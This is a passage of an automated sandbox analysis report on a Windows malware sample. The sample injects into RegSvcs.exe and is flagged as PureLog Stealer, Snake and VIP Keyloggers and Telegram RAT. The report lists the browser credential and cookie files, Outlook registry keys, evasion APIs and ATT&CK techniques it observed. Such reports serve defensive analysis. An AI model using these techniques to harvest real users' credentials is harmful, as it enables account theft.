Source: RegSvcs.exe, 00000002.00000002.4516159706.000000000448E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: RegSvcs.exe, 00000002.00000002.4516159706.000000000448E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: RegSvcs.exe, 00000002.00000002.4512068209.0000000001095000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: RegSvcs.exe, 00000002.00000002.4516159706.00000000044E9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: RegSvcs.exe, 00000002.00000002.4516159706.000000000448E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: RegSvcs.exe, 00000002.00000002.4516159706.000000000448E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: RegSvcs.exe, 00000002.00000002.4516159706.00000000044E9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696428655f
Source: RegSvcs.exe, 00000002.00000002.4516159706.000000000448E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: RegSvcs.exe, 00000002.00000002.4516159706.000000000448E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: RegSvcs.exe, 00000002.00000002.4516159706.00000000044E9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: RegSvcs.exe, 00000002.00000002.4516159706.000000000448E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: RegSvcs.exe, 00000002.00000002.4516159706.00000000044E9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: RegSvcs.exe, 00000002.00000002.4516159706.000000000448E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: RegSvcs.exe, 00000002.00000002.4516159706.000000000448E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: RegSvcs.exe, 00000002.00000002.4516159706.00000000044E9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: RegSvcs.exe, 00000002.00000002.4516159706.00000000044E9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655
Source: RegSvcs.exe, 00000002.00000002.4516159706.00000000044E9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: RegSvcs.exe, 00000002.00000002.4516159706.00000000044E9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: RegSvcs.exe, 00000002.00000002.4516159706.00000000044E9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: RegSvcs.exe, 00000002.00000002.4516159706.00000000044E9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: RegSvcs.exe, 00000002.00000002.4516159706.00000000044E9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: RegSvcs.exe, 00000002.00000002.4516159706.00000000044E9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: RegSvcs.exe, 00000002.00000002.4516159706.000000000448E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: RegSvcs.exe, 00000002.00000002.4516159706.00000000044E9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696428655x

Source: C:\Users\user\Desktop\n0nsAzvYNd.exe	API call chain: ExitProcess graph end node			graph_0-101156
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	API call chain: ExitProcess graph end node

Source: C:\Users\user\Desktop\n0nsAzvYNd.exe

Code function: 0_2_00413F09 BlockInput,

0_2_00413F09

Source: C:\Users\user\Desktop\n0nsAzvYNd.exe

Code function: 0_2_003A3B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_003A3B3A

Source: C:\Users\user\Desktop\n0nsAzvYNd.exe

Code function: 0_2_003D5A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

0_2_003D5A7C

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

2_2_004019F0

Source: C:\Users\user\Desktop\n0nsAzvYNd.exe

Code function: 0_2_003A4B37 LoadLibraryA,GetProcAddress,

0_2_003A4B37

Source: C:\Users\user\Desktop\n0nsAzvYNd.exe	Code function: 0_2_01010350 mov eax, dword ptr fs:[00000030h]	0_2_01010350
Source: C:\Users\user\Desktop\n0nsAzvYNd.exe	Code function: 0_2_010102F0 mov eax, dword ptr fs:[00000030h]	0_2_010102F0
Source: C:\Users\user\Desktop\n0nsAzvYNd.exe	Code function: 0_2_0100ECF0 mov eax, dword ptr fs:[00000030h]	0_2_0100ECF0

Source: C:\Users\user\Desktop\n0nsAzvYNd.exe

Code function: 0_2_003F80A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,

0_2_003F80A9

Source: C:\Users\user\Desktop\n0nsAzvYNd.exe	Code function: 0_2_003CA124 SetUnhandledExceptionFilter,	0_2_003CA124
Source: C:\Users\user\Desktop\n0nsAzvYNd.exe	Code function: 0_2_003CA155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_003CA155
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_0040CE09
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_0040E61C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_00416F6A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_004123F1 SetUnhandledExceptionFilter,	2_2_004123F1

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\n0nsAzvYNd.exe

Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\n0nsAzvYNd.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: F4A008

Jump to behavior

Source: C:\Users\user\Desktop\n0nsAzvYNd.exe

Code function: 0_2_003F87B1 LogonUserW,

0_2_003F87B1

Source: C:\Users\user\Desktop\n0nsAzvYNd.exe

Code function: 0_2_003A3B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_003A3B3A

Source: C:\Users\user\Desktop\n0nsAzvYNd.exe

Code function: 0_2_003A48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,

0_2_003A48D7

Source: C:\Users\user\Desktop\n0nsAzvYNd.exe

Code function: 0_2_00404C53 mouse_event,

0_2_00404C53

Source: C:\Users\user\Desktop\n0nsAzvYNd.exe

Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\n0nsAzvYNd.exe"

Jump to behavior

Source: C:\Users\user\Desktop\n0nsAzvYNd.exe

Code function: 0_2_003F7CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

0_2_003F7CAF

Source: C:\Users\user\Desktop\n0nsAzvYNd.exe

Code function: 0_2_003F874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_003F874B

Source: n0nsAzvYNd.exe	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: n0nsAzvYNd.exe	Binary or memory string: Shell_TrayWnd

Source: C:\Users\user\Desktop\n0nsAzvYNd.exe

Code function: 0_2_003C862B cpuid

0_2_003C862B

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: GetLocaleInfoA,

2_2_00417A20

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\n0nsAzvYNd.exe

Code function: 0_2_003D4E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_003D4E87

Source: C:\Users\user\Desktop\n0nsAzvYNd.exe

Code function: 0_2_003E1E06 GetUserNameW,

0_2_003E1E06

Source: C:\Users\user\Desktop\n0nsAzvYNd.exe

Code function: 0_2_003D3F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

0_2_003D3F3A

Source: C:\Users\user\Desktop\n0nsAzvYNd.exe

Code function: 0_2_003A49A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_003A49A0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Binary or memory string: procmon.exe

Stealing of Sensitive Information

Yara detected PureLog Stealer

Source: Yara match	File source: 2.2.RegSvcs.exe.55b0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2eca89e.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2ec99b6.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2eca89e.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.3080000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.3080ee8.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.3080ee8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.3080000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.55b0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2ec99b6.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.4516159706.00000000041D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.4513063241.0000000002E89000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.4513303031.0000000003080000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.4518233311.00000000055B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Yara detected Snake Keylogger

Source: Yara match

File source: 00000002.00000002.4513561000.0000000003131000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 2.2.RegSvcs.exe.55b0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2eca89e.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2ec99b6.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2eca89e.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.3080000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.3080ee8.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.3080ee8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.3080000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.55b0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2ec99b6.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.4513063241.0000000002E89000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.4513303031.0000000003080000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.4518233311.00000000055B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 4148, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 2.2.RegSvcs.exe.55b0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2eca89e.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2ec99b6.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2eca89e.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.3080000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.3080ee8.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.3080ee8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.3080000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.55b0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2ec99b6.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.4513063241.0000000002E89000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.4513303031.0000000003080000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.4518233311.00000000055B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.4513561000.000000000326A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 4148, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior

Source: n0nsAzvYNd.exe	Binary or memory string: WIN_81
Source: n0nsAzvYNd.exe	Binary or memory string: WIN_XP
Source: n0nsAzvYNd.exe	Binary or memory string: WIN_XPe
Source: n0nsAzvYNd.exe	Binary or memory string: WIN_VISTA
Source: n0nsAzvYNd.exe	Binary or memory string: WIN_7
Source: n0nsAzvYNd.exe	Binary or memory string: WIN_8
Source: n0nsAzvYNd.exe	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Source: Yara match	File source: 2.2.RegSvcs.exe.55b0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2eca89e.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2ec99b6.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2eca89e.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.3080000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.3080ee8.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.3080ee8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.3080000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.55b0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2ec99b6.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.4516159706.00000000041D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.4513063241.0000000002E89000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.4513303031.0000000003080000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.4518233311.00000000055B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 4148, type: MEMORYSTR

Remote Access Functionality

Yara detected PureLog Stealer

Source: Yara match	File source: 2.2.RegSvcs.exe.55b0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2eca89e.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2ec99b6.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2eca89e.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.3080000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.3080ee8.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.3080ee8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.3080000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.55b0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2ec99b6.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.4516159706.00000000041D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.4513063241.0000000002E89000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.4513303031.0000000003080000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.4518233311.00000000055B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Yara detected Snake Keylogger

Source: Yara match

File source: 00000002.00000002.4513561000.0000000003131000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 2.2.RegSvcs.exe.55b0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2eca89e.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2ec99b6.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2eca89e.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.3080000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.3080ee8.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.3080ee8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.3080000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.55b0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2ec99b6.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.4513063241.0000000002E89000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.4513303031.0000000003080000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.4518233311.00000000055B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 4148, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 2.2.RegSvcs.exe.55b0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2eca89e.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2ec99b6.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2eca89e.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.3080000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.3080ee8.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.3080ee8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.3080000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.55b0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2ec99b6.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.4513063241.0000000002E89000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.4513303031.0000000003080000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.4518233311.00000000055B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.4513561000.000000000326A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 4148, type: MEMORYSTR

Source: C:\Users\user\Desktop\n0nsAzvYNd.exe	Code function: 0_2_00416283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,		0_2_00416283
Source: C:\Users\user\Desktop\n0nsAzvYNd.exe	Code function: 0_2_00416747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		0_2_00416747

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	2 Native API	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	11 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	2 Valid Accounts	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	4 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	2 Valid Accounts	3 Obfuscated Files or Information	Security Account Manager	1 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	21 Access Token Manipulation	1 DLL Side-Loading	NTDS	137 System Information Discovery	Distributed Component Object Model	21 Input Capture	1 Non-Standard Port	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	212 Process Injection	2 Valid Accounts	LSA Secrets	251 Security Software Discovery	SSH	3 Clipboard Data	3 Non-Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	11 Virtualization/Sandbox Evasion	Cached Domain Credentials	11 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	24 Application Layer Protocol	Data Transfer Size Limits	Service Stop
